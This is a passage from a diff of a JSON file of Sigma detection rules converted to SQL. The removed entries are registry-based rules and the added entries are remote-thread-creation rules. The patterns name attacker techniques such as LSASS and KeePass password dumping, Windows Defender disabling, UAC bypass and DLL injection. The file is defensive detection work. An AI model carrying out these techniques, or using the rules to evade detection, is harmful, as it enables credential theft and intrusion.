ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", - "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", + "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Administrator actions" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" - ], - "filename": "registry_set_disable_windows_defender_service.yml" - }, - { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE 